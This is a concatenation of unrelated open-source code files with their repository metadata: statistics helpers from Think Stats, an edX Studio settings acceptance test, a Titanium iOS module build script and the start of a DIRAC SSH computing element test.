returns: float probability density
"""
return lam * math.exp(-lam * x)
def EvalExponentialCdf(x, lam):
"""Evaluates CDF of the exponential distribution with parameter lam."""
return 1 - math.exp(-lam * x)
def MakeExponentialPmf(lam, high, n=200):
"""Makes a PMF discrete approx to an exponential distribution.
lam: parameter lambda in events per unit time
high: upper bound
n: number of values in the Pmf
returns: normalized Pmf
"""
pmf = Pmf()
for x in np.linspace(0, high, n):
p = EvalExponentialPdf(x, lam)
pmf.Set(x, p)
pmf.Normalize()
return pmf
def StandardNormalCdf(x):
"""Evaluates the CDF of the standard Normal distribution.
See http://en.wikipedia.org/wiki/Normal_distribution
#Cumulative_distribution_function
Args:
x: float
Returns:
float
"""
return (math.erf(x / ROOT2) + 1) / 2
def EvalNormalCdf(x, mu=0, sigma=1):
"""Evaluates the CDF of the normal distribution.
Args:
x: float
mu: mean parameter
sigma: standard deviation parameter
Returns:
float
"""
return stats.norm.cdf(x, loc=mu, scale=sigma)
def EvalNormalCdfInverse(p, mu=0, sigma=1):
"""Evaluates the inverse CDF of the normal distribution.
See http://en.wikipedia.org/wiki/Normal_distribution#Quantile_function
Args:
p: float
mu: mean parameter
sigma: standard deviation parameter
Returns:
float
"""
return stats.norm.ppf(p, loc=mu, scale=sigma)
def EvalLognormalCdf(x, mu=0, sigma=1):
"""Evaluates the CDF of the lognormal distribution.
x: float or sequence
mu: mean parameter
sigma: standard deviation parameter
Returns: float or sequence
"""
return stats.lognorm.cdf(x, loc=mu, scale=sigma)
def RenderExpoCdf(lam, low, high, n=101):
"""Generates sequences of xs and ps for an exponential CDF.
lam: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
xs = np.linspace(low, high, n)
ps = 1 - np.exp(-lam * xs)
#ps = stats.expon.cdf(xs, scale=1.0/lam)
return xs, ps
def RenderNormalCdf(mu, sigma, low, high, n=101):
"""Generates sequences of xs and ps for a Normal CDF.
mu: parameter
sigma: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
xs = np.linspace(low, high, n)
ps = stats.norm.cdf(xs, mu, sigma)
return xs, ps
def RenderParetoCdf(xmin, alpha, low, high, n=50):
"""Generates sequences of xs and ps for a Pareto CDF.
xmin: parameter
alpha: parameter
low: float
high: float
n: number of points to render
returns: numpy arrays (xs, ps)
"""
if low < xmin:
low = xmin
xs = np.linspace(low, high, n)
ps = 1 - (xs / xmin) ** -alpha
#ps = stats.pareto.cdf(xs, scale=xmin, b=alpha)
return xs, ps
class Beta(object):
"""Represents a Beta distribution.
See http://en.wikipedia.org/wiki/Beta_distribution
"""
def __init__(self, alpha=1, beta=1, label=None):
"""Initializes a Beta distribution."""
self.alpha = alpha
self.beta = beta
self.label = label if label is not None else '_nolegend_'
def Update(self, data):
"""Updates a Beta distribution.
data: pair of int (heads, tails)
"""
heads, tails = data
self.alpha += heads
self.beta += tails
def Mean(self):
"""Computes the mean of this distribution."""
return self.alpha / (self.alpha + self.beta)
def Random(self):
"""Generates a random variate from this distribution."""
return random.betavariate(self.alpha, self.beta)
def Sample(self, n):
"""Generates a random sample from this distribution.
n: int sample size
"""
size = n,
return np.random.beta(self.alpha, self.beta, size)
def EvalPdf(self, x):
"""Evaluates the PDF at x."""
return x ** (self.alpha - 1) * (1 - x) ** (self.beta - 1)
def MakePmf(self, steps=101, label=None):
"""Returns a Pmf of this distribution.
Note: Normally, we just evaluate the PDF at a sequence
of points and treat the probability density as a probability
mass.
But if alpha or beta is less than one, we have to be
more careful because the PDF goes to infinity at x=0
and x=1. In that case we evaluate the CDF and compute
differences.
The result is a little funny, because the values at 0 and 1
are not symmetric. Nevertheless, it is a reasonable discrete
model of the continuous distribution, and behaves well as
the number of values increases.
"""
if self.alpha < 1 or self.beta < 1:
cdf = self.MakeCdf()
pmf = cdf.MakePmf()
return pmf
xs = [i / (steps - 1.0) for i in range(steps)]
probs = [self.EvalPdf(x) for x in xs]
pmf = Pmf(dict(zip(xs, probs)), label=label)
return pmf
def MakeCdf(self, steps=101):
"""Returns the CDF of this distribution."""
xs = [i / (steps - 1.0) for i in range(steps)]
ps = special.betainc(self.alpha, self.beta, xs)
cdf = Cdf(xs, ps)
return cdf
def Percentile(self, ps):
"""Returns the given percentiles from this distribution.
ps: scalar, array, or list of [0-100]
"""
ps = np.asarray(ps) / 100
xs = special.betaincinv(self.alpha, self.beta, ps)
return xs
class Dirichlet(object):
"""Represents a Dirichlet distribution.
See http://en.wikipedia.org/wiki/Dirichlet_distribution
"""
def __init__(self, n, conc=1, label=None):
"""Initializes a Dirichlet distribution.
n: number of dimensions
conc: concentration parameter (smaller yields more concentration)
label: string label
"""
if n < 2:
raise ValueError('A Dirichlet distribution with '
'n<2 makes no sense')
self.n = n
self.params = np.ones(n, dtype=np.float) * conc
self.label = label if label is not None else '_nolegend_'
def Update(self, data):
"""Updates a Dirichlet distribution.
data: sequence of observations, in order corresponding to params
"""
m = len(data)
self.params[:m] += data
def Random(self):
"""Generates a random variate from this distribution.
Returns: normalized vector of fractions
"""
p = np.random.gamma(self.params)
return p / p.sum()
def Likelihood(self, data):
"""Computes the likelihood of the data.
Selects a random vector of probabilities from this distribution.
Returns: float probability
"""
m = len(data)
if self.n < m:
return 0
x = data
p = self.Random()
q = p[:m] ** x
return q.prod()
def LogLikelihood(self, data):
"""Computes the log likelihood of the data.
Selects a random vector of probabilities from this distribution.
Returns: float log probability
"""
m = len(data)
if self.n < m:
return float('-inf')
x = self.Random()
y = np.log(x[:m]) * data
return y.sum()
def MarginalBeta(self, i):
"""Computes the marginal distribution of the ith element.
See http://en.wikipedia.org/wiki/Dirichlet_distribution
#Marginal_distributions
i: int
Returns: Beta object
"""
alpha0 = self.params.sum()
alpha = self.params[i]
return Beta(alpha, alpha0 - alpha)
def PredictivePmf(self, xs, label=None):
"""Makes a predictive distribution.
xs: values to go into the Pmf
Returns: Pmf that maps from x to the mean prevalence of x
"""
alpha0 = self.params.sum()
ps = self.params / alpha0
return Pmf(zip(xs, ps), label=label)
def BinomialCoef(n, k):
"""Compute the binomial coefficient "n choose k".
n: number of trials
k: number of successes
Returns: float
"""
return scipy.misc.comb(n, k)
def LogBinomialCoef(n, k):
"""Computes the log of the binomial coefficient.
http://math.stackexchange.com/questions/64716/
approximating-the-logarithm-of-the-binomial-coefficient
n: number of trials
k: number of successes
Returns: float
"""
return n * math.log(n) - k * math.log(k) - (n - k) * math.log(n - k)
def NormalProbability(ys, jitter=0.0):
"""Generates data for a normal probability plot.
ys: sequence of values
jitter: float magnitude of jitter added to the ys
returns: numpy arrays xs, ys
"""
n = len(ys)
xs = np.random.normal(0, 1, n)
xs.sort()
if jitter:
ys = Jitter(ys, jitter)
else:
ys = np.array(ys)
ys.sort()
return xs, ys
def Jitter(values, jitter=0.5):
"""Jitters the values by adding a uniform variate in (-jitter, jitter).
values: sequence
jitter: scalar magnitude of jitter
returns: new numpy array
"""
n = len(values)
return np.random.normal(0, jitter, n) + values
def NormalProbabilityPlot(sample, fit_color='0.8', **options):
"""Makes a normal probability plot with a fitted line.
sample: sequence of numbers
fit_color: color string for the fitted line
options: passed along to Plot
"""
xs, ys = NormalProbability(sample)
mean, var = MeanVar(sample)
std = math.sqrt(var)
fit = FitLine(xs, mean, std)
thinkplot.Plot(*fit, color=fit_color, label='model')
xs, ys = NormalProbability(sample)
thinkplot.Plot(xs, ys, **options)
def Mean(xs):
"""Computes mean.
xs: sequence of values
returns: float mean
"""
return np.mean(xs)
def Var(xs, mu=None, ddof=0):
"""Computes variance.
xs: sequence of values
mu: option known mean
ddof: delta degrees of freedom
returns: float
"""
xs = np.asarray(xs)
if mu is None:
mu = xs.mean()
ds = xs - mu
return np.dot(ds, ds) / (len(xs) - ddof)
def Std(xs, mu=None, ddof=0):
"""Computes standard deviation.
xs: sequence of values
mu: option known mean
ddof: delta degrees of freedom
returns: float
"""
var = Var(xs, mu, ddof)
return math.sqrt(var)
def MeanVar(xs, ddof=0):
"""Computes mean and variance.
Based on http://stackoverflow.com/questions/19391149/
numpy-mean-and-variance-from-single-function
xs: sequence of values
ddof: delta degrees of freedom
returns: pair of float, mean and var
"""
xs = np.asarray(xs)
mean = xs.mean()
s2 = Var(xs, mean, ddof)
return mean, s2
def Trim(t, p=0.01):
"""Trims the largest and smallest elements of t.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
sequence of values
"""
n = int(p * len(t))
t = sorted(t)[n:-n]
return t
def TrimmedMean(t, p=0.01):
"""Computes the trimmed mean of a sequence of numbers.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
float
"""
t = Trim(t, p)
return Mean(t)
def TrimmedMeanVar(t, p=0.01):
"""Computes the trimmed mean and variance of a sequence of numbers.
Side effect: sorts the list.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
float
"""
t = Trim(t, p)
mu, var = MeanVar(t)
return mu, var
def CohenEffectSize(group1, group2):
"""Compute Cohen's d.
group1: Series or NumPy array
group2: Series or NumPy array
returns: float
"""
diff = group1.mean() - group2.mean()
n1, n2 = len(group1), len(group2)
var1 = group1.var()
var2 = group2.var()
pooled_var = (n1 * var1 + n2 * var2) / (n1 + n2)
d = diff / math.sqrt(pooled_var)
return d
def Cov(xs, ys, meanx=None, meany=None):
"""Computes Cov(X, Y).
Args:
xs: sequence of values
ys: sequence of values
meanx: optional float mean of xs
meany: optional float mean of ys
Returns:
Cov(X, Y)
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
if meanx is None:
meanx = np.mean(xs)
if meany is None:
meany = np.mean(ys)
cov = np.dot(xs-meanx, ys-meany) / len(xs)
return cov
def Corr(xs, ys):
"""Computes Corr(X, Y).
Args:
xs: sequence of values
ys: sequence of values
Returns:
Corr(X, Y)
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
meanx, varx = MeanVar(xs)
meany, vary = MeanVar(ys)
corr = Cov(xs, ys, meanx, meany) / math.sqrt(varx * vary)
return corr
def SerialCorr(series, lag=1):
"""Computes the serial correlation of a series.
series: Series
lag: integer number of intervals to shift
returns: float correlation
"""
xs = series[lag:]
ys = series.shift(lag)[lag:]
corr = Corr(xs, ys)
return corr
def SpearmanCorr(xs, ys):
"""Computes Spearman's rank correlation.
Args:
xs: sequence of values
ys: sequence of values
Returns:
float Spearman's correlation
"""
xranks = pandas.Series(xs).rank()
yranks = pandas.Series(ys).rank()
return Corr(xranks, yranks)
def MapToRanks(t):
"""Returns a list of ranks corresponding to the elements in t.
Args:
t: sequence of numbers
Returns:
list of integer ranks, starting at 1
"""
# pair up each value with its index
pairs = enumerate(t)
# sort by value
sorted_pairs = sorted(pairs, key=itemgetter(1))
# pair up each pair with its rank
ranked = enumerate(sorted_pairs)
# sort by index
resorted = sorted(ranked, key=lambda trip: trip[1][0])
# extract the ranks
ranks = [trip[0]+1 for trip in resorted]
return ranks
def LeastSquares(xs, ys):
"""Computes a linear least squares fit for ys as a function of xs.
Args:
xs: sequence of values
ys: sequence of values
Returns:
tuple of (intercept, slope)
"""
meanx, varx = MeanVar(xs)
meany = Mean(ys)
slope = Cov(xs, ys, meanx, meany) / varx
inter = meany - slope * meanx
return inter, slope
def FitLine(xs, inter, slope):
"""Fits a line to the given data.
xs: sequence of x
returns: tuple of numpy arrays (sorted xs, fit ys)
"""
fit_xs = np.sort(xs)
fit_ys = inter + slope * fit_xs
return fit_xs, fit_ys
def Residuals(xs, ys, inter, slope):
"""Computes residuals for a linear fit with parameters inter and slope.
Args:
xs: independent variable
ys: dependent variable
inter: float intercept
slope: float slope
Returns:
list of residuals
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
res = ys - (inter + slope * xs)
return res
def CoefDetermination(ys, res):
"""Computes the coefficient of determination (R^2) for given residuals.
Args:
ys: dependent variable
res: residuals
Returns:
float coefficient of determination
"""
return 1 - Var(res) / Var(ys)
def CorrelatedGenerator(rho):
"""Generates standard normal variates with serial correlation.
rho: target coefficient of correlation
Returns: iterable
"""
x = random.gauss(0, 1)
yield x
sigma = math.sqrt(1 - rho**2)
while True:
x = random.gauss(x * rho, sigma)
yield x
def CorrelatedNormalGenerator(mu, sigma, rho):
"""Generates normal variates with serial correlation.
mu: mean of variate
sigma: standard deviation of variate
rho: target coefficient of correlation
Returns: iterable
"""
for x in CorrelatedGenerator(rho):
yield x * sigma + mu
def RawMoment(xs, k):
"""Computes the kth raw moment of xs.
"""
return sum(x**k for x in xs) / len(xs)
def CentralMoment(xs, k):
"""Computes the kth central moment of xs.
"""
mean = RawMoment(xs, 1)
return sum((x - mean)**k for x in xs) / len(xs)
def StandardizedMoment(xs, k):
"""Computes the kth standardized moment of xs.
"""
var = CentralMoment(xs, 2)
std = math.sqrt(var)
return CentralMoment(xs, k) / std**k
def Skewness(xs):
"""Computes skewness.
"""
return StandardizedMoment(xs, 3)
def Median(xs):
"""Computes the median (50th percentile) of a sequence.
xs: sequence or anything else that can initialize a Cdf
returns: float
"""
cdf = Cdf(xs)
return cdf.Value(0.5)
def IQR(xs):
"""Computes the interquartile of a sequence.
xs: sequence or anything else that can initialize a Cdf
returns: pair of floats
"""
cdf = Cdf(xs)
return cdf.Value(0.25), cdf.Value(0.75)
def PearsonMedianSkewness(xs):
"""Computes the Pearson median skewness.
"""
median = Median(xs)
mean = RawMoment(xs, 1)
var = CentralMoment(xs, 2)
std = math.sqrt(var)
gp = 3 * (mean - median) / std
return gp
class FixedWidthVariables(object):
"""Represents a set of variables in a fixed width file."""
def __init__(self, variables, index_base=0):
"""Initializes.
variables: DataFrame
index_base: are the indices 0 or 1 based?
Attributes:
colspecs: list of (start, end) index tuples
names: list of string variable names
"""
self.variables = variables
# note: by default, subtract 1 from colspecs
self.colspecs = variables[['start', 'end']] - index_base
# convert colspecs to a list of pair of int
self.colspecs = self.colspecs.astype(np.int).values.tolist()
self.names = variables['name']
def ReadFixedWidth(self, filename, **options):
"""Reads a fixed width ASCII file.
filename: string filename
returns: DataFrame
"""
df = pandas.read_fwf(filename,
colspecs=self.colspecs,
names=self.names,
**options)
return df
def ReadStataDct(dct_file, **options):
"""Reads a Stata dictionary file.
dct_file: string filename
options: dict of options passed to open()
returns: FixedWidthVariables object
"""
type_map = dict(byte=int, int=int, long=int, float=float, double=float)
var_info = []
for line in open(dct_file, **options):
match = re.search( r'_column\(([^)]*)\)', line)
if match:
start = int(match.group(1))
t = line.split()
vtype, name, fstring = t[1:4]
name = name.lower()
if vtype.startswith('str'):
vtype = str
else:
vtype = type_map[vtype]
long_desc = ' '.join(t[4:]).strip('"')
var_info.append((start, vtype, name, fstring, long_desc))
columns = ['start', 'type', 'name', 'fstring', 'desc']
variables = pandas.DataFrame(var_info, columns=columns)
# fill in the end column by shifting the start column
variables['end'] = variables.start.shift(-1)
variables.loc[len(variables)-1, 'end'] = 0
dct = FixedWidthVariables(variables, index_base=1)
return dct
def Resample(xs, n=None):
"""Draw a sample from xs with the same length as xs.
xs: sequence
n: sample size (default: len(xs))
returns: NumPy array
"""
if n is None:
n = len(xs)
return np.random.choice(xs, n, replace=True)
def SampleRows(df, nrows, replace=False):
"""Choose a sample of rows from a DataFrame.
df: DataFrame
nrows: number of rows
replace: whether to sample with replacement
returns: DataDf
"""
indices = np.random.choice(df.index, nrows, replace=replace)
sample = df.loc[indices]
return sample
def ResampleRows(df):
"""Resamples rows from a DataFrame.
df: DataFrame
returns: DataFrame
"""
return SampleRows(df, len(df), replace=True)
def ResampleRowsWeighted(df, column='finalwgt'):
"""Resamples a DataFrame using probabilities proportional to given column.
df: DataFrame
column: string column name to use as weights
returns: DataFrame
"""
weights = df[column].copy()
weights /= sum(weights)
indices = np.random.choice(df.index, len(df), replace=True, p=weights)
sample = df.loc[indices]
return sample
def PercentileRow(array, p):
"""Selects the row from a sorted array that maps to percentile p.
p: float 0--100
returns: NumPy array (one row)
"""
rows, cols = array.shape
index = int(rows * p / 100)
return array[index,]
def PercentileRows(ys_seq, percents):
"""Given a collection of lines, selects percentiles along vertical axis.
For example, if ys_seq contains simulation results like ys as a
function of time, and percents contains (5, 95), the result would
be a 90% CI for each vertical slice of the simulation results.
ys_seq: sequence of lines (y values)
percents: list of percentiles (0-100) to select
returns: list of NumPy arrays, one for each percentile
"""
nrows = len(ys_seq)
ncols = len(ys_seq[0])
array = np.zeros((nrows, ncols))
for i, ys in enumerate(ys_seq):
array[i,] = ys
array = np.sort(array, axis=0)
rows = [PercentileRow(array, p) for p in percents]
return rows
def Smooth(xs, sigma=2, **options):
"""Smooths a NumPy array with a Gaussian filter.
xs: sequence
sigma: standard deviation of the filter
"""
return ndimage.filters.gaussian_filter1d(xs, sigma, **options)
class HypothesisTest(object):
"""Represents a hypothesis test."""
def __init__(self, data):
"""Initializes.
data: data in whatever form is relevant
"""
self.data = data
self.MakeModel()
self.actual = self.TestStatistic(data)
self.test_stats = None
self.test_cdf = None
def PValue(self, iters=1000):
"""Computes the distribution of the test statistic and p-value.
iters: number of iterations
returns: float p-value
"""
self.test_stats = [self.TestStatistic(self.RunModel())
for _ in range(iters)]
self.test_cdf = Cdf(self.test_stats)
count = sum(1 for x in self.test_stats if x >= self.actual)
return count / iters
def MaxTestStat(self):
"""Returns the largest test statistic seen during simulations.
"""
return max(self.test_stats)
def PlotCdf(self, label=None):
"""Draws a Cdf with vertical lines at the observed test stat.
"""
def VertLine(x):
"""Draws a vertical line at x."""
thinkplot.Plot([x, x], [0, 1], color='0.8')
VertLine(self.actual)
thinkplot.Cdf(self.test_cdf, label=label)
def TestStatistic(self, data):
"""Computes the test statistic.
data: data in whatever form is relevant
"""
raise UnimplementedMethodException()
def MakeModel(self):
"""Build a model of the null hypothesis.
"""
pass
def RunModel(self):
"""Run the model of the null hypothesis.
returns: simulated data
"""
raise UnimplementedMethodException()
def main():
pass
if __name__ == '__main__':
main()
|
smorton2/think-stats
|
code/thinkstats2.py
|
Python
|
gpl-3.0
| 70,025
|
[
"Gaussian"
] |
524f2df7adee26d00012dd6bc687d7aefc51131f081d9bae675a326f0b28f417
|
"""
Acceptance tests for Studio's Setting pages
"""
from nose.plugins.attrib import attr
from base_studio_test import StudioCourseTest
from ...pages.studio.settings_advanced import AdvancedSettingsPage
@attr('shard_1')
class AdvancedSettingsValidationTest(StudioCourseTest):
"""
Tests for validation feature in Studio's advanced settings tab
"""
def setUp(self):
super(AdvancedSettingsValidationTest, self).setUp()
self.advanced_settings = AdvancedSettingsPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
self.type_fields = ['Course Display Name', 'Advanced Module List', 'Discussion Topic Mapping',
'Maximum Attempts', 'Course Announcement Date']
# Before every test, make sure to visit the page first
self.advanced_settings.visit()
self.assertTrue(self.advanced_settings.is_browser_on_page())
def test_modal_shows_one_validation_error(self):
"""
Test that advanced settings don't save if there's a single wrong input,
and that it shows the correct error message in the modal.
"""
# Feed an integer value for String field.
# .set method saves automatically after setting a value
course_display_name = self.advanced_settings.get('Course Display Name')
self.advanced_settings.set('Course Display Name', 1)
self.advanced_settings.wait_for_modal_load()
# Test Modal
self.check_modal_shows_correct_contents(['Course Display Name'])
self.advanced_settings.refresh_and_wait_for_load()
self.assertEquals(
self.advanced_settings.get('Course Display Name'),
course_display_name,
'Wrong input for Course Display Name must not change its value'
)
def test_modal_shows_multiple_validation_errors(self):
"""
Test that advanced settings don't save with multiple wrong inputs
"""
# Save original values and feed wrong inputs
original_values_map = self.get_settings_fields_of_each_type()
self.set_wrong_inputs_to_fields()
self.advanced_settings.wait_for_modal_load()
# Test Modal
self.check_modal_shows_correct_contents(self.type_fields)
self.advanced_settings.refresh_and_wait_for_load()
for key, val in original_values_map.iteritems():
self.assertEquals(
self.advanced_settings.get(key),
val,
'Wrong input for Advanced Settings Fields must not change its value'
)
def test_undo_changes(self):
"""
Test that undo changes button in the modal resets all settings changes
"""
# Save original values and feed wrong inputs
original_values_map = self.get_settings_fields_of_each_type()
self.set_wrong_inputs_to_fields()
# Let modal popup
self.advanced_settings.wait_for_modal_load()
# Press Undo Changes button
self.advanced_settings.undo_changes_via_modal()
# Check that changes are undone
for key, val in original_values_map.iteritems():
self.assertEquals(
self.advanced_settings.get(key),
val,
'Undoing Should revert back to original value'
)
def test_manual_change(self):
"""
Test that manual changes button in the modal keeps settings unchanged
"""
inputs = {"Course Display Name": 1,
"Advanced Module List": 1,
"Discussion Topic Mapping": 1,
"Maximum Attempts": '"string"',
"Course Announcement Date": '"string"',
}
self.set_wrong_inputs_to_fields()
self.advanced_settings.wait_for_modal_load()
self.advanced_settings.trigger_manual_changes()
# Check that the validation modal went away.
self.assertFalse(self.advanced_settings.is_validation_modal_present())
# Iterate through the wrong values and make sure they're still displayed
for key, val in inputs.iteritems():
print self.advanced_settings.get(key)
print val
self.assertEquals(
str(self.advanced_settings.get(key)),
str(val),
'manual change should keep: ' + str(val) + ', but is: ' + str(self.advanced_settings.get(key))
)
def check_modal_shows_correct_contents(self, wrong_settings_list):
"""
Helper function that checks if the validation modal contains correct
error messages.
"""
# Check presence of modal
self.assertTrue(self.advanced_settings.is_validation_modal_present())
# List of wrong settings item & what is presented in the modal should be the same
error_item_names = self.advanced_settings.get_error_item_names()
self.assertEqual(set(wrong_settings_list), set(error_item_names))
error_item_messages = self.advanced_settings.get_error_item_messages()
self.assertEqual(len(error_item_names), len(error_item_messages))
def get_settings_fields_of_each_type(self):
"""
Get one of each field type:
- String: Course Display Name
- List: Advanced Module List
- Dict: Discussion Topic Mapping
- Integer: Maximum Attempts
- Date: Course Announcement Date
"""
return {
"Course Display Name": self.advanced_settings.get('Course Display Name'),
"Advanced Module List": self.advanced_settings.get('Advanced Module List'),
"Discussion Topic Mapping": self.advanced_settings.get('Discussion Topic Mapping'),
"Maximum Attempts": self.advanced_settings.get('Maximum Attempts'),
"Course Announcement Date": self.advanced_settings.get('Course Announcement Date'),
}
def set_wrong_inputs_to_fields(self):
"""
Set wrong values for the chosen fields
"""
self.advanced_settings.set_values(
{
"Course Display Name": 1,
"Advanced Module List": 1,
"Discussion Topic Mapping": 1,
"Maximum Attempts": '"string"',
"Course Announcement Date": '"string"',
}
)
|
c0710204/edx-platform
|
common/test/acceptance/tests/studio/test_studio_settings.py
|
Python
|
agpl-3.0
| 6,475
|
[
"VisIt"
] |
531be978020219f6a0ba691915da9df4cb51a7ff24ef6e0f33a63f58fa50a002
|
#!/usr/bin/env python
#
# Appcelerator Titanium Module Packager
#
#
import os, subprocess, sys, glob, string
import zipfile
from datetime import date
cwd = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
os.chdir(cwd)
required_module_keys = ['name','version','moduleid','description','copyright','license','copyright','platform','minsdk']
module_defaults = {
'description':'My module',
'author': 'Your Name',
'license' : 'Specify your license',
'copyright' : 'Copyright (c) %s by Your Company' % str(date.today().year),
}
module_license_default = "TODO: place your license here and we'll include it in the module distribution"
def find_sdk(config):
sdk = config['TITANIUM_SDK']
return os.path.expandvars(os.path.expanduser(sdk))
def replace_vars(config,token):
idx = token.find('$(')
while idx != -1:
idx2 = token.find(')',idx+2)
if idx2 == -1: break
key = token[idx+2:idx2]
if not config.has_key(key): break
token = token.replace('$(%s)' % key, config[key])
idx = token.find('$(')
return token
def read_ti_xcconfig():
contents = open(os.path.join(cwd,'titanium.xcconfig')).read()
config = {}
for line in contents.splitlines(False):
line = line.strip()
if line[0:2]=='//': continue
idx = line.find('=')
if idx > 0:
key = line[0:idx].strip()
value = line[idx+1:].strip()
config[key] = replace_vars(config,value)
return config
def generate_doc(config):
docdir = os.path.join(cwd,'documentation')
if not os.path.exists(docdir):
print "Couldn't find documentation file at: %s" % docdir
return None
try:
import markdown2 as markdown
except ImportError:
import markdown
documentation = []
for file in os.listdir(docdir):
if file in ignoreFiles or os.path.isdir(os.path.join(docdir, file)):
continue
md = open(os.path.join(docdir,file)).read()
html = markdown.markdown(md)
documentation.append({file:html});
return documentation
def compile_js(manifest,config):
js_file = os.path.join(cwd,'assets','jptech.ios7media.js')
if not os.path.exists(js_file): return
from compiler import Compiler
try:
import json
except:
import simplejson as json
compiler = Compiler(cwd, manifest['moduleid'], manifest['name'], 'commonjs')
root_asset, module_assets = compiler.compile_module()
root_asset_content = """
%s
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[0]);
""" % root_asset
module_asset_content = """
%s
NSNumber *index = [map objectForKey:path];
if (index == nil) {
return nil;
}
return filterDataInRange([NSData dataWithBytesNoCopy:data length:sizeof(data) freeWhenDone:NO], ranges[index.integerValue]);
""" % module_assets
from tools import splice_code
assets_router = os.path.join(cwd,'Classes','JptechIos7mediaModuleAssets.m')
splice_code(assets_router, 'asset', root_asset_content)
splice_code(assets_router, 'resolve_asset', module_asset_content)
# Generate the exports after crawling all of the available JS source
exports = open('metadata.json','w')
json.dump({'exports':compiler.exports }, exports)
exports.close()
def die(msg):
print msg
sys.exit(1)
def warn(msg):
print "[WARN] %s" % msg
def validate_license():
c = open(os.path.join(cwd,'LICENSE')).read()
if c.find(module_license_default)!=-1:
warn('please update the LICENSE file with your license text before distributing')
def validate_manifest():
path = os.path.join(cwd,'manifest')
f = open(path)
if not os.path.exists(path): die("missing %s" % path)
manifest = {}
for line in f.readlines():
line = line.strip()
if line[0:1]=='#': continue
if line.find(':') < 0: continue
key,value = line.split(':')
manifest[key.strip()]=value.strip()
for key in required_module_keys:
if not manifest.has_key(key): die("missing required manifest key '%s'" % key)
if module_defaults.has_key(key):
defvalue = module_defaults[key]
curvalue = manifest[key]
if curvalue==defvalue: warn("please update the manifest key: '%s' to a non-default value" % key)
return manifest,path
ignoreFiles = ['.DS_Store','.gitignore','libTitanium.a','titanium.jar','README']
ignoreDirs = ['.DS_Store','.svn','.git','CVSROOT']
def zip_dir(zf,dir,basepath,ignoreExt=[]):
if not os.path.exists(dir): return
for root, dirs, files in os.walk(dir):
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file in ignoreFiles: continue
e = os.path.splitext(file)
if len(e) == 2 and e[1] in ignoreExt: continue
from_ = os.path.join(root, file)
to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
zf.write(from_, to_)
def glob_libfiles():
files = []
for libfile in glob.glob('build/**/*.a'):
if libfile.find('Release-')!=-1:
files.append(libfile)
return files
def build_module(manifest,config):
from tools import ensure_dev_path
ensure_dev_path()
rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
if rc != 0:
die("xcodebuild failed")
rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
if rc != 0:
die("xcodebuild failed")
# build the merged library using lipo
moduleid = manifest['moduleid']
libpaths = ''
for libfile in glob_libfiles():
libpaths+='%s ' % libfile
os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def package_module(manifest,mf,config):
name = manifest['name'].lower()
moduleid = manifest['moduleid'].lower()
version = manifest['version']
modulezip = '%s-iphone-%s.zip' % (moduleid,version)
if os.path.exists(modulezip): os.remove(modulezip)
zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
zf.write(mf,'%s/manifest' % modulepath)
libname = 'lib%s.a' % moduleid
zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
docs = generate_doc(config)
if docs!=None:
for doc in docs:
for file, html in doc.iteritems():
filename = string.replace(file,'.md','.html')
zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
zip_dir(zf,'assets',modulepath,['.pyc','.js'])
zip_dir(zf,'example',modulepath,['.pyc'])
zip_dir(zf,'platform',modulepath,['.pyc','.js'])
zf.write('LICENSE','%s/LICENSE' % modulepath)
zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
exports_file = 'metadata.json'
if os.path.exists(exports_file):
zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
zf.close()
if __name__ == '__main__':
manifest,mf = validate_manifest()
validate_license()
config = read_ti_xcconfig()
sdk = find_sdk(config)
sys.path.insert(0,os.path.join(sdk,'iphone'))
sys.path.append(os.path.join(sdk, "common"))
compile_js(manifest,config)
build_module(manifest,config)
package_module(manifest,mf,config)
sys.exit(0)
|
delapecci/titanium-modules
|
ios7media/build.py
|
Python
|
mit
| 6,797
|
[
"VisIt"
] |
c5c1d5154e96bea8890a1ebbc5a88eee3587a306bbde4ee876b20acb91f3478e
|
#!/bin/env python
"""
tests for SSHComputingElement module
"""
import os
import shutil
import subprocess32 as subprocess
import shlex
import pytest
import DIRAC
from DIRAC.Resources.Computing.SSHComputingElement import SSHComputingElement
from DIRAC.Resources.Computing.BatchSystems.executeBatch import executeBatchContent
@pytest.mark.parametrize("batchSystem", ["Condor", "GE", "Host", "LSF", "OAR", "SLURM", "Torque"])
def test_generateControlScript(batchSystem):
"""Test that the control script generated by the merging operation
between a BatchSystem and executeBatch.py is:
* complete: contains the content of both files
* executable and doesn't raise any syntax error.
Example: it may check that a __future__ import is not misplaced in the script due to the
merging of the files.
"""
ce = SSHComputingElement("Test_SSHCE")
# Change the batch system file used during the control script generation
ce.loadBatchSystem(batchSystem)
# Get the local control script
result = ce._generateControlScript()
assert result["OK"] is True
source = result["Value"]
dest = "execute_batch.py"
# Simulate operation done by the scpCall method
# Copy the local control script into the "remote" control script
# As the source can be composed of multiple files, we have to copy the content of each file
sources = source.split(" ")
with open(dest, "wb") as dst:
for sourceFile in sources:
with open(sourceFile, "rb") as src:
shutil.copyfileobj(src, dst)
# Test that the control script is complete
with open(dest, "r") as dst:
dataDest = dst.read()
batchSystemDir = os.path.join(os.path.dirname(DIRAC.__file__), "Resources", "Computing", "BatchSystems")
batchSystemScript = os.path.join(batchSystemDir, "%s.py" % batchSystem)
with open(batchSystemScript, "r") as bsc:
